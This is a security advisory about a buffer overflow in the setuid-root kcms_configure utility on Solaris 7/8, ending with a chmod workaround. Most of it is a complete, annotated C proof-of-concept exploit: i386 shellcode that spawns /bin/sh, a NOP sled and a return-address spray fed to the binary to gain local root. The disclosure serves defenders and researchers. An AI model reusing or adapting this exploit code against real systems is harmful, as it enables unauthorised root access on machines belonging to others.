COMMAND

    kcms_configure

SYSTEMS AFFECTED

    Solaris 7/8 (x86 and sparc)

PROBLEM

    eEye Digital Security (Riley Hassell) found the following.  They have
    discovered a buffer overflow in the kcms_configure utility  provided
    with Solaris 7.  The problem exists in the parsing of  command  line
    options: an over-long option argument overruns a  fixed-size  buffer
    in the setuid-root binary.  By exploiting this vulnerability a local
    attacker can achieve root privileges.  The Kodak Color Management
    System (KCMS) packages have contained many vulnerabilities in the
    past; we recommend disabling them if you are not currently using
    them.

    Proof of Concept:

    /*
     Command line argument overflow
     /usr/openwin/bin/kcms_configure
    
     Proof of Concept Exploitation
     Riley Hassell
    */
    
    #include <errno.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    /* Size in bytes of the oversized argument handed to kcms_configure. */
    enum { BUFLEN = 1100 };

    /*
     * Payload, labelled "seteuid/exec shellcode" by the author.  It contains
     * no NUL byte, so it survives being passed as one C-string argv entry;
     * its tail carries the string "/bin/sh" (0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68).
     * The bytes are reproduced verbatim and are i386 machine code.
     */
    char shell[] =
    "\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05\xe8\xf9\xff\xff\xff"
    "\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2\x50\xb0\x8d\xe8\xe0\xff\xff\xff"
    "\x29\xc0\x50\xb0\x17\xe8\xd6\xff\xff\xff\xeb\x1f\x5e\x8d\x1e\x89\x5e"
    "\x0b\x29\xc0\x88\x46\x19\x89\x46\x14\x89\x46\x0f\x89\x46\x07\xb0"
    "\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18\xe8\xdc\xff\xff\xff\x2f\x62"
    "\x69\x6e\x2f\x73\x68\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03"
    "\x03\x9a\x04\x04\x04\x04\x07\x04";

    /* The argument itself: NOP sled, payload, then repeated return addresses
     * (filled in by main). */
    char buf[BUFLEN];

    /* Length of the NOP sled that precedes the payload (set by main). */
    unsigned long int nop;

    /* Stack pointer sampled via get_esp() (set by main). */
    unsigned long int esp;

    /* Adjustment added to esp to form the guessed return address; main
     * overrides it from argv[1] or with its built-in default. */
    long int offset = 0;
    
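    /*
     * Return the current stack pointer (i386 only).
     *
     * The original left the value in %eax as a side effect of the asm
     * statement and then fell off the end of a non-void function, which is
     * undefined behaviour in C and only happens to work without optimisation.
     * An explicit output operand routes the value through a real `return`.
     * %esp is a 32-bit register, so a 32-bit temporary matches its width on
     * the 32-bit Solaris x86 target; the widening matches the original's
     * return type.  On a 64-bit build this yields only the low 32 bits of the
     * stack pointer, which is not a usable address -- the PoC is 32-bit only.
     */
    unsigned long int get_esp(void)
    {
            unsigned int sp;
            __asm__ __volatile__ ("movl %%esp, %0" : "=r" (sp));
            return sp;
    }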
    
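    /*
     * Build one oversized argv entry and exec kcms_configure with it.
     *
     * Layout of buf (BUFLEN bytes): a NOP sled of `nop` bytes, the payload
     * from `shell`, then the guessed return address (esp + offset) repeated
     * to the end, with the final byte NUL so the whole buffer is one C string.
     * The overflow is in the target's own option parsing; this program only
     * supplies the over-long argument.
     *
     * argv[1], if given, overrides the default offset of -300 (any strtol
     * base prefix is accepted).  Returns EXIT_FAILURE if the offset is
     * malformed or the exec fails; on success execl does not return.
     */
    int main(int argc, char *argv[])
    {
            uint32_t ret;   /* 32-bit target address written into the spray */
            size_t i;

            if (argc > 1) {
                    /* Reject a garbage offset instead of silently using 0. */
                    char *end = NULL;
                    errno = 0;
                    offset = strtol(argv[1], &end, 0);
                    if (end == argv[1] || *end != '\0' || errno == ERANGE) {
                            fprintf(stderr, "usage: %s [offset]\n", argv[0]);
                            return EXIT_FAILURE;
                    }
            } else {
                    offset = -300;
            }
            nop = 600;
            esp = get_esp();
            ret = (uint32_t)(esp + offset);

            memset(buf, 0x90, BUFLEN);                  /* 0x90 = x86 NOP */
            memcpy(buf + nop, shell, sizeof shell - 1); /* payload after the sled */

            /* Spray the return address over the rest of the buffer.  memcpy
             * instead of the original `*(int *)&buf[i] = ...` avoids the
             * misaligned int store; the resulting byte layout is unchanged
             * (first slot one byte past the payload, last slot ending at
             * BUFLEN). */
            for (i = nop + (sizeof shell - 1) + 1; i + sizeof ret <= BUFLEN; i += sizeof ret) {
                    memcpy(buf + i, &ret, sizeof ret);
            }
            buf[BUFLEN - 1] = '\0';

            /* The sentinel must be a char * null pointer: a bare NULL may be
             * a plain int on some ABIs and is then mis-read by execl. */
            execl("/usr/openwin/bin/kcms_configure", "eEye", "-o", "-S", "X", buf, (char *)NULL);

            /* execl only returns on failure. */
            perror("execl");
            return EXIT_FAILURE;
    }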

SOLUTION

    Sun Microsystems has been  contacted.  They are  currently working
    on patches  for this  and other  related vulnerabilities  eEye has
    discovered.

    Workaround:

        chmod -s /usr/openwin/bin/kcms_configure

    This removes the setuid bit from kcms_configure (run it as root).  The
    overflow itself is still reachable, but the program then runs only with
    the invoking user's privileges, so exploiting it no longer yields root.
    Note that any legitimate non-root use of kcms_configure that depended
    on the setuid bit may stop working; apply the vendor patch once it is
    available.